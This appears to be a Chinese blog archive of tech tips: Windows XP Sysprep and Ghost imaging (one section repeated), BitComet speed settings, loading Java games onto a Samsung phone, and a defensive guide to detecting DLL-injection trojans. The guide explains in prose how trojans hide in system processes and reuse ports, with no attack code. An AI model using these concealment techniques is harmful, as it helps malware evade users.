  对设备驱动程序的最后一步手术是更改IDE ATA / ATAPI 控制器。这一步非常重要,因为大家知道,不同的主板,例如Intel、Nforce 2、VIA等主板,其IDE ATA / ATAPI控制器的驱动程序有很大的差别,根本无法通用!

   在设备管理器控制台窗口用鼠标右键单击IDE ATA / ATAPI控制器、Intel (r) 82371 AB / EB Bus Master IDE Controller,在弹出菜单上单击“更新驱动程序”菜单项;

   在打开的“硬件更新向导”对话框里选中“从列表或指定位置安装(高级)”选项,并单击“下一步”按钮;

   在接下来的页面里选中“不要搜索,我自己选择要安装的驱动程序”选项,并单击“下一步”按钮;

   然后选择“标准的双通道PCI IDE控制器”选项,并根据屏幕提示一路Next,只是最后提示是否重新启动时,一定不要重启!

 

  四、准备主映像文件

  删除了“母机”上的驱动程序,还不能说已经马到成功。这是因为每一台计算机都有一个惟一的安全标识符(SID: security identifier),如果直接把磁盘映像复制到其他计算机上,那么其他计算机都有会具有同样的SID,所以需要用Sysprep工具去除“母机”的SID,从而强迫目标计算机产生新的SID。

  1. 自动应答文件

  在目标计算机恢复克隆备份时,系统会开始一个Mini-Setup向导过程,该向导会提示我们输人特定的计算机变量,例如管理员密码、计算机名等等。但是由于在克隆备份里去除了驱动程序,所以在这个阶段无法使用键盘、鼠标进行交互。不过我们可以创建一个自动安装应答文件,让这个应答文件自动回复安装程序提出的问题。

   把Windows XP安装光盘插人光驱,将SUPPORTTOOLS目录下的DEPLOY.CAB文件释放到C:Sysprep目录;

   然后运行其中的setupmgr.exe文件,在出现选择安装类型界面中选择“Sysprep安装”选项;

   根据屏幕提示填入必要的信息,一直单击“Next”按钮,直至最后进人保存配置文件的对话框,一定要确保最后的安装脚本路径是C:Sysprepsysprep.inf。

  2.重新封装

  现在可以利用Sysprep工具去除“母机”的SID,很简单:运行C:Sysprep目录下的Sysprep.exe程序,然后在打开的窗口中单击“重新封装”按钮。接下来会提示下一次启动时将重新生成SID,单击“确定”按钮,稍等片刻,计算机将会自动关闭。

  五、克隆主映像文件

  计算机关闭之后,我们就可以用Ghost 2003启动盘引导计算机,然后依次单击“Local→Partition→To Image”命令,指定源分区为C盘,再设置Ghost映像文件的路径和文件名,开始备份。备份结束后,我们就拥有了一个万能的Windows XP映像文件!

  四、准备主映像文件

  删除了“母机”上的驱动程序,还不能说已经马到成功。这是因为每一台计算机都有一个惟一的安全标识符(SID: security identifier),如果直接把磁盘映像复制到其他计算机上,那么其他计算机都有会具有同样的SID,所以需要用Sysprep工具去除“母机”的SID,从而强迫目标计算机产生新的SID。

  1. 自动应答文件

  在目标计算机恢复克隆备份时,系统会开始一个Mini-Setup向导过程,该向导会提示我们输人特定的计算机变量,例如管理员密码、计算机名等等。但是由于在克隆备份里去除了驱动程序,所以在这个阶段无法使用键盘、鼠标进行交互。不过我们可以创建一个自动安装应答文件,让这个应答文件自动回复安装程序提出的问题。

   把Windows XP安装光盘插人光驱,将SUPPORTTOOLS目录下的DEPLOY.CAB文件释放到C:Sysprep目录;

   然后运行其中的setupmgr.exe文件,在出现选择安装类型界面中选择“Sysprep安装”选项;

   根据屏幕提示填入必要的信息,一直单击“Next”按钮,直至最后进人保存配置文件的对话框,一定要确保最后的安装脚本路径是C:Sysprepsysprep.inf。

  2.重新封装

  现在可以利用Sysprep工具去除“母机”的SID,很简单:运行C:Sysprep目录下的Sysprep.exe程序,然后在打开的窗口中单击“重新封装”按钮。接下来会提示下一次启动时将重新生成SID,单击“确定”按钮,稍等片刻,计算机将会自动关闭。

  五、克隆主映像文件

  计算机关闭之后,我们就可以用Ghost 2003启动盘引导计算机,然后依次单击“Local→Partition→To Image”命令,指定源分区为C盘,再设置Ghost映像文件的路径和文件名,开始备份。备份结束后,我们就拥有了一个万能的Windows XP映像文件!

2005年02月24日

最近,我发现一个办法,可以使 BT 下载速度达到近 180K !(我用的是 ADSL 2M 外网)   一、 BitComet 设置: ( 未加说明的参数,请保持原始设定值不变 )   1. 运行 BitComet 0.56 ,打开自己的 BitComet 的 ” 选项 ” 一栏,点击第一栏 ” 网络连接 ”   全局最大下载速度 无限制 调整到 1000(2M 以下用户 1000 是个不可达到的数字,所以可行 ) 。  全局最大上传速度 无限制 调整到 40 ( 根据个人情况合理选择,这是我的建议数 ) 。  监听端口 建议不要和 6881-6889 16881-16889 重复,个人感觉 19770-22000 之间比较好。  ( 当然你映射了端口,那么就以你映射的监听端口为准,不需改动 ) ,装了防火墙的用户在你的防火墙里面打开你的监听端口。   2. 点击任务设置,目前此项里面的参数暂时保持不变,在后来的调整中需要用到其中的“每任务最大上传速度”   3. 点击界面外观   最多显示 peer 数量 改到 1000   4. 点击高级设置   如果多少分钟之内不能连接则添加备用 Tracker:30 30 改到 0   备用 Tracker 列表   5. 点击网络连接   每任务最大连接数:改到 1000 。  每任务保持连接数:改到 50 。  全局保证上传连接数:改到 10 。  连接发起间隔: 改到 150 或 100 。  最大同时尝试的 TCP 连接个数: 改到 1000 。  是否允许通过 UDP 实现内网互连:内网设定“允许” 公网设定“禁止”。   6. 点击 IP 规则   下载任务每 IP 最大允许连接数 : 改到 20   上传任务每 IP 最大允许连接数 : 改到 5   内网的用户把“允许向服务器报告内网 IP 便于子网内连接”打上钩   7. 点击磁盘缓存   256M 内存配置  磁盘缓存最小值: 6M   磁盘缓存最大值: 30M   减小磁盘缓存当空闲物理内存低于: 50M   在最大最小值范围内自动调整缓存大小上打上钩。   二、下载过程的参数调整   热门种子:   1. 进行完上面的设置,请您下载一个热门种子 ( 种子数超过 20 ,用户连接数超过 200) ,单独开始这一个下载。   2. 下载时您可以看见连接的种子和用户在不断增加,上传下载速度缓慢增加,等速度达到您平时正常下载速度的 1/2 ,连接数大于 50 ,种子数 1 个以上时 ( 大约需要 5-10 分钟 ) ,点击“任务设置”把“每任务最大上传速度”改到 10-20 之间一个数,继续下载。   3. 2 分钟后,如果你的速度起来了,并且起伏不大相对稳定,请保持。如果你的速度没有起来,可以用以下 2 种办法:   a. 把每任务最大上传继续以每次 2K 的速度调小;   b.a 不起作用说明你的调整时间不对,把“每任务最大上传速度”恢复到“无限制”过段时间再调小它。   冷门种子   冷门种子在您进行调小“每任务最大上传速度”时可能效果不大,如果有效果,请保持。无效果,就不要设置“每任务最大上传速度”或者设高点比如 25-30 。   注意事项:   1. 想知道自己是内网还是外网的看自己的 IP , 10.x.x.x , 192.168.x.x 都是内网,看不见远程的基本也是内网。   2. 外网用户如果 BitComet0.56 下载效果不理想可以试用 BC 以前版本或者贪婪 abc 、比特精灵等。   3. 限制上传的朋友下载完毕后,强烈要求取消全局上传限制做种 3 个小时以上。   4. 热门种子下载时,尽量只下载一个文件,这样才让你享受到 BitComet 的飞速快感。   5. 上传参数的选取,要依据自己的网络情况,仔细调整,如果我说的参数不适合您,请您自己多琢磨,仔细进行微调。   我的调节经验:   一个任务开始下载几分钟以后,就把上面第 5 点方法的“每任务保持连接数”由“ 1000 ”改为“自动调整”,全局最大下载速度再改回“无限制”,一会你就会发现, BT 的速度明显比调节前快了 ( 我的现在一般是 170-180K, 比以前快了近 50K ! ) ;如果变化不大,再在两个办法之间来回设置一下。

2005年01月23日
不用刷机 通过数据线下载JAVA
小小米 2004-04-09 14:48:45

    不用刷机,通过数据线下载JAVA?下面以电脑操作系统XP为例,详细介绍:

一,新建连接向导。
    在网上邻居里,打开“新建连接向导”——选择“设置高级连接”——“直接连接到其他计算机”——选择“主机”——选择数据线实际插的串口!
(如选COM2为例)图解如下

20044717535606.jpg<br />
按此在新窗口浏览图片!

20044717535586.jpg<br />
按此在新窗口浏览图片!

20044914548660.jpg<br />
按此在新窗口浏览图片!

20044717535858.jpg<br />
按此在新窗口浏览图片!

二,以上设置完后在手机上输入#*536963#

    再输入#*5737425# ,选第一项(只能选一次,不然会白屏),这时,电脑上应该会建立一个新连接。

三,下载运行Samsung xxxx java Uploader

    http://www.52dreams.com/viewFile.asp?Boardid=29&ID=46717

    将JAVA加进去

    选择手机上的 “2.Serial Download”

    游戏下载完后,回到待机状态再输入#*5737425#并选- “2.Serial Download”,一直重复这步,只到JAVA下载完为止。

四,提醒注意:

    1、JAVA游戏不能放在中文目录下(如D:\游戏、D:\java\游戏都不对,应当是D:\java、d:\java\games等);

    2、手机上的JAVA空间应足够下载当前游戏!

   有兴趣的不妨试试,免去了大家对刷机的后顾之忧!

2004年12月03日

随着MS的操作系统从Win98过渡到Winnt系统(包括2k/xp),MS的任务管理器也一下子脱胎换骨,变得火眼金睛起来(在WINNT下传统木马再也无法隐藏自己的进程),这使得以前在win98下靠将进程注册为系统服务就能够从任务管理器中隐形的木马面临前所未有的危机,所以木马的开发者及时调整了开发思路,所以才会有今天这篇讨论如何清除动态嵌入式DLL木马的文章。

  首先,我们来了解一下什么是动态嵌入式木马,为了在NT系统下能够继续隐藏进程,木马的开发者们开始利用DLL(Dynamic Link Library动态链接库)文件,起初他们只是将自己的木马写成DLL形式来替换系统中负责Win Socket1.x的函数调用wsock32.dll(Win Socket2中则由WS2_32.DLL负责),这样通过对约定函数的操作和对未知函数的转发(DLL木马替换wsock32.dll时会将之更名,以便实现日后的函数转发)来实现远程控制的功能。但是随着MS数字签名技术和文件恢复功能的出台,这种DLL马的生命力也日渐衰弱了,于是在开发者的努力下出现了时下的主流木马–动态嵌入式DLL木马,将DLL木马嵌入到正在运行的系统进程中.explorer.exe、svchost.exe、smss.exe等无法结束的系统关键进程是DLL马的最爱,这样这样在任务管理器里就不会出现我们的DLL文件,而是我们DLL的载体EXE文件.当然通过进一步的加工DLL木马还可以实现另外的一些如端口劫持/复用(也就是所谓的无端口)、注册为系统服务、开多线程保护、等功能。简而言之,就是DLL木马达到了前所未有的隐蔽程度。

  那么我们如何来发现并清除DLL木马呢?

  一,从DLL木马的DLL文件入手,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录:运行CMD–转换目录到system32–dir *.exe>exeback.txt& dir *.dll>dllback.txt,这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.这是我们用同样的命令将system32下的EXE和DLL文件记录到另外exeback1.txt和dllback1.txt中,然后运行CMD–fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DLL掉,我们可以先把它移到回收站里,若系统没有异常反应再将之彻底删除或者提交给杀毒软件公司。

  二、上文也曾提到一些系统关键进程是这类木马的最爱,所以一旦我们怀疑系统已经进驻了DLL木马,我们当然要对这些关键进程重点照顾了,怎么照顾?这里推荐一个强大的脱壳工具工具Procedump.exe他可以帮您看出进程到底调用了那些DLL文件,但是由于有的进程调用的DLL文件非常多,使得靠我们自己去一个核对变的不太现实,所以我们会用到一个shotgun写的NT进程/内存模块查看器ps.exe,用命令ps.exe/a /m >nowdlls.txt将系统目前调用地所有DLL文件地名称保存到nowdlls.txt,然后我们再用fc将之于事先备份dllback.txt比较一下,这样也能够缩小排查范围。

  三、还记得木马的特征之一端口么?所有的木马只要进行连接,只要它接受/发送数据则必然会打开端口,DLL木马也不例外,这也为我们发现他们提供了一条线索,我们可以使用foundstone的进程端口查看工具Fport.exe来查看与端口对应的进程,这样可以将范围缩小到具体的进程,然后结合Procedump来查找DLL木马就比较容易了.当然有如上文提到的有些木马会通过端口劫持或者端口重用的方法来进行通信,139、80、1443、等常见端口则是木马的最爱。因为即使即使用户使用端口扫描软件检查自己的端口,发现的也是类似TCP UserIP:1026 ControllerIP:80

  ESTABLISHED 的情况,稍微疏忽一点,您就会以为是自己在浏览网页(防火墙也会这么认为的)。所以光看端口还不够,我们要对端口通信进行监控,这就是第四点要说的。

  四、我们可以利用嗅探器来了解打开的端口到底在传输些什么数据。通过将网卡设为混杂模式就可以接受所有的IP报文,嗅探程序可以从中选择值得关注的部分进行分析,剩下的无非是按照RFC文档对协议进行解码。这样就可以确定木马使用的端口,结合Fport和Procedump我们就能够查找到该DLL木马了。至于嗅探器个人推荐使用IRIS,图形界面比较容易上手。

  五、通常说道查杀木马我们会习惯性地到注册表碰碰运气,以前可能还蛮有效的,但如果碰到注册为系统服务的木马(原理:在NT/2K/XP这些系统中,系统启动时会加载指定的服务程序)这时候检查:启动组/注册表/autoexec.bat/win.ini/sysytem.ini/wininit.ini/*.inf(例如autorun.inf)/config.sys等文件 就发现不了丝毫的异样,这时候我们就应该查看一下系统服务了:右击我的电脑–管理–服务和应用程序–服务,这时您会看到100多个服务,(MS也真是的,其中75%对个人用户无用,可以禁止。),慢慢找吧,看谁不顺眼就把它拎出来:),当然如果您以前曾经用导出列表功能对服务备份过,则用文件比较的方法会很容易发现哪些是外来客,这时您可以记录下服务加载的是那个文件,然后用Resource Kits里提供的srvinstw.exe来移除该服务并清除被加载的文件。

  通过以上五步,基本能发现并清除狡猾的动态嵌入式DLL木马了,也许您也发现如果适当地做一些备份,会对我们的查找木马的过程有很大的帮助,当然也会减轻不少工作的压力哦。